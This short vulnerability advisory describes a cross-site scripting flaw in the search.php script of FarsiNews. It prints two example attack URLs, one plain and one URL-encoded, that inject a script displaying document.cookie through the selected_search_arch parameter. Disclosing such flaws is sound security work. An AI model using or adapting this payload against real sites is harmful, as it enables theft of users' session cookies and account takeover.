FarsiNews Search.PHP Cross-Site Scripting Vulnerability

FarsiNews Search.PHP Cross-Site Scripting Vulnerability

This issue can be exploited through a web client.

Example URIs have been provided:

http://www.example.com/[farsinews_path]/search.php?selected_search_arch=><script>alert(document.cookie)</script><!--
http://www.example.com/[farsinews_path]/search.php?selected_search_arch=%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--